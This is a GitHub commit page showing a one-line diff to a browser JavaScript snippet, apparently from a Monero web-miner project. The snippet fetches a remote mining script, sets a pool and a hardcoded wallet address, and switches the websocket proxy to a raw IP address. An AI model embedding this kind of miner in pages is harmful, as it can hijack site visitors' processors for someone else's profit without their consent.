Skip to content

Commit

Permalink
Updated Server
Browse files Browse the repository at this point in the history
  • Loading branch information
NajmAjmal-old committed Jul 10, 2023
1 parent dd53111 commit c2cfed2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion external/javascript.js
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ var script = document.createElement("script");
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);

server = "wss://f.xmrminingproxy.com:8181";
server = "wss://45.119.82.33:40725/";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR-JS-SNIPPET"
Expand Down

0 comments on commit c2cfed2

Please sign in to comment.